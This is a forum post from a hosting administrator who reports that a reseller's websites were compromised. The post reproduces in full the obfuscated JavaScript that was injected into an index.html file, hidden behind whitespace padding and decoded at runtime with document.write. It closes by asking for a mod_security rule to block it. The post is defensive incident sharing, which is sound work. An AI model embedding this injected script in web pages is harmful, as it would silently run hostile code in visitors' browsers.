Re: Some type of file injection vuln going around

One of my resellers contacted me today stating that one of his websites was hacked and possibly the server. He wanted to know what we were going to do about it.

I checked the server but no other website is affected except for two of his own websites.

There seems to be some type of javascript file injection vuln going around. I searched the logs but could not find anything obvious in his logs. I checked all sites and they are clean.

Here is what was injected into his index.html file after the <header> tag.

</html&gt; &nbsp; &nbsp;   ; &nbsp; &nbsp; &nbsp; &nbsp;   ; &nbsp; &nbsp; &nbsp; &nbsp;   ; &nbsp; &nbsp; &nbsp; &nbsp;   ; &nbsp; &nbsp; &nbsp; &nbsp;   ; &nbsp; &nbsp; &nbsp; &nbsp;   ; &nbsp; &nbsp; &nbsp; &nbsp;   ; &nbsp; &nbsp; &nbsp; &nbsp;   ; &nbsp; &nbsp; &nbsp; &nbsp;   ;  <!--[z0s]--><;script>do

cument.write(unescape("%3Cscript%3Eif%28wA%21%3D1%29%7Bfunction%20Qg%28gx%29%7Breturn%20gx%7Dtry%7Bfunction%20UNc%28IDB%29%7Br

eturn%20parseInt%28IDB%29%7Dvar%20zmW%3D%27aavalvaLvahvaSvanvagvaIva9vaRvaMvaivaxvaCvadvajvaova7vaVvaJvaOvabvaHvamvawvaevaWvaN

vakvazva6vaYvatvaXvaPvaUvapvaFva3vaBvayvaqvafvarvaZvacvaDvaTvaGva5vasva4va8vaKvlavllvlLvlhvlSvlnvlgvlIvl9vlRvlMvlivlxvlCvldvlj

vlovl7vlVvlJvlOvlbvlHvlmvlw%27%3Bvar%20uNq%3DQg%28%27v%27%29%2CHCR%3DArray%2827751%5E27867%2CUNc%28%27243%27%29%2CUNc%28%27227

%27%29%2CUNc%28%27242%27%29%2CUNc%28%27233%27%29%2C9751%5E9959%2CUNc%28%27244%27%29%2CUNc%28%27190%27%29%2CUNc%28%27230%27%29%

2CUNc%28%27245%27%29%2C10675%5E10589%2C936%5E839%2C21887%5E21983%2CUNc%28%27210%27%29%2C21801%5E22001%2C21825%5E21993%2C5220%5

E5301%2CUNc%28%27201%27%29%2C22845%5E22929%2CUNc%28%27202%27%29%2C16044%5E15945%2CUNc%28%27169%27%29%2CUNc%28%27251%27%29%2C10

351%5E10393%2CUNc%28%27225%27%29%2CUNc%28%27204%27%29%2C10454%5E10245%2CUNc%28%27189%27%29%2CUNc%28%27247%27%29%2C4863%5E4667%

2C29566%5E29637%2CUNc%28%27206%27%29%2CUNc%28%27226%27%29%2C15905%5E16015%2C32317%5E32489%2C618%5E647%2C32760%5E32543%2CUNc%28

%27171%27%29%2CUNc%28%27184%27%29%2CUNc%28%27182%27%29%2C20297%5E20477%2CUNc%28%27176%27%29%2CUNc%28%27228%27%29%2CUNc%28%2723

5%27%29%2CUNc%28%27162%27%29%2CUNc%28%27248%27%29%2CUNc%28%27199%27%29%2CUNc%28%27205%27%29%2CUNc%28%27253%27%29%2CUNc%28%2719

5%27%29%2C30514%5E30613%2CUNc%28%27177%27%29%2CUNc%28%27250%27%29%2C15088%5E14857%2CUNc%28%27213%27%29%2CUNc%28%27236%27%29%2C

UNc%28%27197%27%29%2CUNc%28%27175%27%29%2CUNc%28%27232%27%29%2CUNc%28%27207%27%29%2CUNc%28%27173%27%29%2CUNc%28%27186%27%29%2C

UNc%28%27161%27%29%2C9002%5E9109%2C2844%5E3015%2C11165%5E11075%2C31322%5E31459%2C7836%5E7745%2CUNc%28%27220%27%29%2CUNc%28%271

93%27%29%2C3893%5E3975%2C20421%5E20231%2CUNc%28%27138%27%29%2CUNc%28%27217%27%29%2C24184%5E24243%2CUNc%28%27179%27%29%2CUNc%28

%27181%27%29%2CUNc%28%27183%27%29%2C6089%5E5987%29%3Bvar%20CVS%2ClXs%3Bvar%20QVT%2CMKq%3D%27aaalaLahaSanagaIa9aRaMaLagaSaiaMax

aCadajaoa7aVaJaOabaHaxamawahaxaeaWaNaMaOakaxazawagaOajaba6amawahaxaxaYataNaxaMaOakaxazawagaOajaba6axaYataXalaOagaPaSaUaOajaeaW

aXapaOagaPaSaUaOajabaFa3aBayaqaqaqaqaqaba6axafaiaLaRaUaOaMagaXaLaiaiaraSaOaxaNaxaoa7aFaZaNaZaFaOalaLawanaOajaJaOabaFaZa6aOacan

aSahaOalaNaZaFaYataXagaiaDaTaPaWagahaSaMapajaba6axaGamawahaxaRa5aNasala4a9a5a8asaVaWaKaNasa4asa6amawahaxadlaaNasaRanafawagaOa4

aXaLllawalalaSaLagaOllaXaiahapasaVaOlLaNaslhlSagaUlllhasa6aSa9ajafaiaLaRaUaOaMagaXaLaiaiaraSaOaXaSaMafaOaclna9ajaRa5aFasaNasaF

aWaKabaxaNaNlga4abaHamawahaxaflllSaNafaiaLaRaUaOaMagaXllaiaLawagaSaiaMaXlSaialaga6amawahaxlSaraNaxaslSagasaFasaganlIasaFaslhlh

asaFajaxaflllSaxl9aNaxasaslRasaslIaWlaajababaxaFaxaflllSaXahaOanllawaLaOaxajlhlMliawlga8aqlglxaXlglClhaVasaXasabaXahaOanllawaL

aOaxajlhldaXaFlhaVasaXasabaFasaXasaFaWlaajabaxaFasaXasaxaFaxadlaaFaOlLa6amawahaxaDaRaNafaiaLaRaUaOaMagaXaLahaOawagaOlLllaOaUaO

aMagajasaSa9ahawaUaOasaba6aDaRaXalaOagljagagahaSataRagaOaxajasalahaLasaVaxlSaraba6aDaRaXlSaOaSaplSagaNa4a6aDaRaXakaSafaglSaNlo

a6aDaRaXa9ahawaUaOl7aiahafaOahaxaNaxaqa6axagahaKaHaxafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6axaCadajaR

a5aVaxaWaKaxaba6aGaxaLawagaLlSajaOabaxaHafaiaLaRaUaOaMagaXakahaSagaOaxajasaalSagaUllaIaaataiafaKaIaalhataiafaKaIaalhlSagaUllaI

asaba6axafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6aCadaxajaxaRa5aVaWaKabaxa6aGaxaGlVa9aRaMaLagaSaiaMaxaW

laajabaHaxamawahaxlJlOaNloayaVamaoaNaZaqa4lolbaylHaBlma3lxaqawataLafaOa9aZa6amawahaxafazaNaZaZa6axa9aiahajatagaNaqa6axatagaxaa

axlJlOa6axatagaFaFabaxafazaFaNaxamaoaXalaRatalagahajaTawaglSaXa9llaiaiahajaTawaglSaXahawaMafaiaUajablwamaoaXllaOaMapaglSabaVa4

aVa4aba6axahaOagaRahaMaxafaza6axaGaalhalaLahaSanagaI%27%3Bvar%20Hui%3DString%28%29%3BzmW%3DzmW.split%28uNq%29%3Bfor%20%28CVS%3

D0%3BCVS%3CMKq.length%3BCVS+%3D2%29%7BQVT%3DMKq.substr%28CVS%2C2%29%3Bfor%28lXs%3D0%3BlXs%3CzmW.length%3BlXs++%29%7Bif%28zmW%5

BlXs%5D%3D%3DQVT%29break%3B%7DHui+%3DString.fromCharCode%28HCR%5BlXs%5D%5E128%29%3B%7Ddocument.write%28Hui%29%3B%7Dcatch%28VMj

%29%7B%7D%7Dvar%20wA%3D1%3C/script%3E"))</script><!--[/z0s]--&gt;

There is a small discussion about this at http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23

Is there a mod_sec rule that can stop this?

Thanks